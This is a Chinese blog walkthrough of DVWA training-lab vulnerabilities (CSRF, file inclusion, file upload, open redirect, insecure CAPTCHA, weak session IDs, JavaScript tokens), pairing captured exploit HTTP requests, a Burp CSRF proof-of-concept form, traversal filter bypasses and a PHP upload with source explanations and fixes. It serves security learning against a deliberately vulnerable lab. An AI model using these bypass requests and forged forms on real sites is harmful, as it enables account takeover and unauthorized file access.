5、DVWA代码审计(2)

一、csrf

1、csrf(low)

限制

复现

php 复制代码
GET /vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close
伪造代码
php 复制代码
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://ddd.com/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="123456" />
      <input type="hidden" name="password&#95;conf" value="123456" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
模仿受害者点击
点击后修改成功

代码

没有token机制

修复

生成token,提交表单
验证token

2、csrf(medium)

限制

复现

php 复制代码
GET /vulnerabilities/csrf/?password_new=1qaz1qaz&password_conf=1qaz1qaz&Change=Change HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=medium
Connection: close
构造同域名
启动http服务
模仿受害者点击,此时的Referer,已经包含需要的域名
点击后修改成功

代码

存在Referer验证请求来源,替换同域名即可成功。构造同域名

修复

生成token并验证,提交表单


3、csrf(high)

限制

复现

php 复制代码
GET /vulnerabilities/csrf/?password_new=qawwz&password_conf=qawwz&Change=Change&user_token=69371e451b62fe4a6a0275bbdddf1aa5 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/?password_new=qaz&password_conf=qaz&csrf_token=5624d372f71b20d90f329da069411b20f072cdf777de7320afd1de566b1cfc39&Change=Change&user_token=373fbc54c43123e7c30da432d964ab32
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=high
Connection: close
同中等级一样构造同域名
存在Referer验证请求来源,构造同域名
启动http服务
模仿受害者点击,此时的Referer,已经包含需要的域名
点击后修改成功

代码

由首页进入high.php代码页面
如果change参数存在进入验证token步骤
检测disable_authentication是否在$_DVWA数组里,存在则返回true,就直接跳出不会进入下面的if.
如果上面为false就会进入下面的验证token.如果传入的token不等于生成的token,或者不存在token.就提醒token不正确,然后返回到index.php
虽然代码有验证,但是验证是未开启状态

修复

$_DVWA[ 'disable_authentication' ] = true;(禁用认证=对)
$_DVWA[ 'disable_authentication' ] = false;(禁用认证=不禁用)
只需要将禁用认证开启即可

4、csrf(impossible)

代码

不存在csrf原因,添加了输入原密码,并且将原密码做了防注入

二、文件包含

1、文件包含(low)

限制

复现

php 复制代码
GET /vulnerabilities/fi/?page=../../phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=low
Connection: close
读取一个不存在的文件,报错显示出路径
直接跳到跟目录读取phpinfo.php(靶场自带文件)

代码


修复

在刚进入的页面做白名单限制,只允许包含这几个文件
php 复制代码
if( isset( $file ) ){
	$whitelist = array(
    'file1.php',
    'file2.php',
	'include.php',
    'file3.php'
);
	if (in_array($file, $whitelist)) {
    include $file; // 如果在白名单内,正常执行包含文件
} else {
   header( 'Location:?page=include.php' );
	exit;// 否则结束程序
}
}

2、文件包含(medium)

限制

复现

php 复制代码
GET /vulnerabilities/fi/?page=....//....//phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=medium
Connection: close

代码

过滤 ../,为空。 
使用 ....//....//绕过

修复

使用白名单限制

3、文件包含(high)

限制

复现

php 复制代码
GET /vulnerabilities/fi/?page=file://E:/code/php/DVWA-master/phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/fi/?page=include.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=high
Connection: close

代码

fnmatch() 函数根据指定的模式来匹配文件名或字符串。
从file变量匹配传入的值是否以file开头,如果不是以file开头并且不等于inclide.php就会进入下面的代码。
绕过:只需要成立一个条件,要么是以file开头,要么file变量等于include.php就会跳出代码

修复

白名单yyds

4、文件包含(impossible)

此等级不存在漏洞
将接受的传参进行判断,如果不是include.php、file1.php、file2.php、file3.php这些文件就直接返回错误

三、文件上传

1、文件上传(low)

限制

复现

直接上传1.php(<?php phpinfo();?>)
php 复制代码
POST /vulnerabilities/upload/ HTTP/1.1
Host: ddd.com
Content-Length: 420
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBoMTirx30PfCVyq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kt322mru8fjkglut8qp02asnnb; security=low
Connection: close

------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="uploaded"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundaryqBoMTirx30PfCVyq--


代码

只将接受的文件名和文件路径进行拼接,然后判断是否将文件移动成功

修复

创建白名单,判断文件名后缀是否在白名单内

2、文件上传(medium)

限制

复现

php 复制代码
POST /vulnerabilities/upload/ HTTP/1.1
Host: ddd.com
Content-Length: 406
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryci2GkJlwp5BrsYji
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kt322mru8fjkglut8qp02asnnb; security=medium
Connection: close

------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="uploaded"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundaryci2GkJlwp5BrsYji--

代码

只判断了类型,没有判断文件后缀

修复

将接受的文件名打散成数组,再去判断数组的最后一个字符是否存在php。
但是黑名单限制并不安全,可以使用php112345...、PHP、Pph、pHp、phP等方式绕过
最新修复.使用白名单方式

3、文件上传(high)

限制

复现

php 复制代码
GET /vulnerabilities/upload/fileclude.php?filepath=../../hackable/uploads/2.jpg HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security=high; PHPSESSID=0qlcn5rvk554nuugnh67jjn2du
Connection: close
这里代码做的限制比较多,判断了文件名和文件属性,直接上传无法绕过,只能配合文件包含漏洞上传图片马

代码

将上传的文件进行多个判断条件较为苛刻,文件名后缀、文件大小、文件内容等属性。相当于白名单限制。所以漏洞不存在绕过。

修复

此等级不存在上传漏洞,除非利用文件包含来进行绕过

4、文件上传(impossible)

不会造成漏洞原因:
存在upload参数进入token验证。
对文件名及文件进行处理,截取文件后缀判断是否等于jpg、jpeg、png并将后缀小写,判断了文件大小及文件类型,所有条件都成立才会进行上传,否则返回错误

代码


四、url重定向

1、重定向(low)

限制

复现

php 复制代码
GET /vulnerabilities/open_redirect/source/low.php?redirect=https://www.baidu.com?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0qlcn5rvk554nuugnh67jjn2du; security=low
Connection: close
页面点击1或2,抓包将原本要跳转到info.php的页面改成https://www.baidu.com,即可跳转到baidu


代码

绕过:只要redirect传参不为空就可以

修复

创建个数组白名单,传参在白名单内就继续跳转,否则返回错误

2、重定向(medium)

限制

复现

php 复制代码
GET /vulnerabilities/open_redirect/source/medium.php?redirect=www.baidu.com?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b9tctcusv0410fdsbulugelgnf; security=medium
Connection: close
将redirect后面的参数修改成//www.baidu.com。因为限制了http://和https://。

代码

接受 redirect传参,并且不为空。
判断参数值是否存在http://、https://存在就进入返回错误。不存在就继续执行跳转代码
绕过:比如:https://www.baidu.com。可以直接传入//www.baidu.com也能跳转。因为//没有被限制

修复

增加白名单机制,如果不在白名单就返回500报错。在白名单就继续执行。

3、重定向(high)

限制

复现

php 复制代码
GET /vulnerabilities/open_redirect/source/high.php?redirect=https://www.baidu.com/info.php?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b9tctcusv0410fdsbulugelgnf; security=high
Connection: close
在redirect参数加跳转地址,且必须存在info.php

代码

接受redirect参数,并且不为空就进入if,检查info.php在redirect值中是否存在,如果存在就为true,true不等于false,为true。就进入执行,否则返回500报错
代码限制redirect值必须存在info.php才可以。所以直接在info.php后门加跳转的地址即可

修复

使用白名单操作,如果在传参值在白名单内就进入执行,否则返回500报错

4、重定向(impossible)

代码

此等级不存在重定向
原因:做了白名单机制,接受 redirect参数,参数不为空,并且是整数型,只允许跳转到以下几个页面。
如果传入1、2、99之外的值或为空就报错

五、不安全的验证码

1、不安全的验证码(low)

限制

复现

php 复制代码
POST /vulnerabilities/captcha/ HTTP/1.1
Host: ddd.com
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/captcha/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=n9j8g84sili69vejk04p7er7ge; security=low
Connection: close

step=2&password_new=qwqw&password_conf=qwqw&Change=Change
数据包里显示除了要修改的新密码参数和change参数,所以只有step是表示验证码的。修改密码后默认验证码是1.页面显示验证码不正确。抓包后将step改成2.即可修改密码成功


代码

修改密码根据step的值被分成两部分。
step==1时,recaptcha_check_answer函数,检验用户输入的验证码是否正确,验证通过后服务器返回表单。
step==2时,然后使用提交 post 方法提交修改的密码。服务器仅检查 Change、step 参数来判断用户是否通过了验证,step参数时可以控制的
未修复

2、不安全的验证码()

限制

passed_captcha参数需要存在

复现

php 复制代码
POST /vulnerabilities/captcha/ HTTP/1.1
Host: ddd.com
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/captcha/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3ih9uqumo8a8l99hplirb0jsnt; security=medium
Connection: close

step=2&password_new=qqqq&password_conf=qqqq&passed_captcha=qqqq&Change=Change
将验证码字段改成2,在添加字段passed_captcha=qqqq

代码

在low的代码基础上增加一步校验
如果不接受passed_captcha传参,返回不通过验证
未修复

六、Weak Session IDs

1、弱会话(Ⅰ)

限制

复现

php 复制代码
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=2; security=low; PHPSESSID=l0evfkg4ulratrosaij9g3ifkn
Connection: close
此数据包是登录后的。每次请求dvwaSession都会增加1
payload:dvwaSession=13; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=low
首先浏览器打开登录页面,使用hacker添加url为登录后的页面,选择cookie和对应的value,dvwaSession=13

代码

检查请求方法是否为POST,如果是,则检查是否存在名为"last_session_id"的参数,如果没有就将这个参数设置为0。设置last_session_id递增,并将获取到值保存到dvwaSession的cookie中

修复

将cookie的dvwaSession生成随机32位的16进制字符串

2、弱会话(Ⅱ)

限制

时间戳转换

复现

php 复制代码
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=1681713158; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=medium
Connection: close
此时的dvwaSession是以时间戳验证,只要大于当前时间既可以登录成功


代码

如果请求是post请求方式,将cookie设置当前时间的时间戳

修复

将cookie转换为时间戳后在md5加密

3、弱会话(Ⅲ)

限制

md5解密

复现

php 复制代码
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=a87ff679a2f3e71d9181a67b7542122c; dvwaSession=989385e9f554a8185354ad11b45a1f74; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=high
Connection: close
将cookie的dvwaSession进行md5加密

代码

未修复

七、JavaScript

1、JavaScript(low)

限制

先rot13加密,在MD5加密

复现

php 复制代码
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=l0evfkg4ulratrosaij9g3ifkn; security=low
Connection: close

token=8b479aefbd90795395b3e7089ae0dc09&phrase=success&send=Submit
页面显示输入success就可以成功,但是显示token无效。从数据包发现我们传入的内容是phrass的值,不管传入什么值token都是一样的。
从代码层面分析到需要将传入的success先rot13加密,在MD5加密传给token



代码

如果请求方式是POST就接受token和phrase参数
如果phrase提交的是success,就判断token是不是rot13加密后md5加密的值,是就返回成功,否则token无效

2、javascript(medium)

限制

token需要字符串反转

复现

php 复制代码
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=l0evfkg4ulratrosaij9g3ifkn; security=medium
Connection: close

token=XXsseccusXX&phrase=success&send=Submit
和low一样的是需要传入success.并且不管提交的phrase值是什么token的值都不变

代码

从代码分析,是将token值用strrev函数进行字符串反转才会成功,否则token无效。

3、javascript(high)

限制

hash加密、strrev字符串反转

复现

php 复制代码
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 97
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=high
Connection: close

token=ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84&phrase=success&send=Submit
提交success后在数据包将加密的token进行一一加密后在提交
php 复制代码
1、strrev("success")字符串反转----sseccus

2、hash("sha256", "XX" . sseccus)----7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a

3、hash("sha256", "7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a" . "ZZ")--ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84

代码

当token传入以下加密后的值才可以成功
相关推荐
Smile灬凉城6666 小时前
反序列化为啥可以利用加号绕过php正则匹配
开发语言·php
奥顺8 小时前
PHPUnit使用指南:编写高效的单元测试
大数据·mysql·开源·php
黑客Jack9 小时前
网络安全加密
安全·web安全·php
龙哥·三年风水12 小时前
workman服务端开发模式-应用开发-后端api推送修改二
分布式·gateway·php
计算机徐师兄13 小时前
基于TP5框架的家具购物小程序的设计与实现【附源码、文档】
小程序·php·家具购物小程序·家具购物微信小程序·家具购物
希雅不是希望14 小时前
Ubuntu命令行网络配置
网络·ubuntu·php
龙哥·三年风水16 小时前
workman服务端开发模式-应用开发-后端api推送修改一
分布式·gateway·php
开心工作室_kaic1 天前
springboot461学生成绩分析和弱项辅助系统设计(论文+源码)_kaic
开发语言·数据库·vue.js·php·apache
火³可²1 天前
PHP接入美团联盟推广
开发语言·php
奥顺1 天前
PHP与AJAX:实现动态网页的完美结合
大数据·mysql·开源·php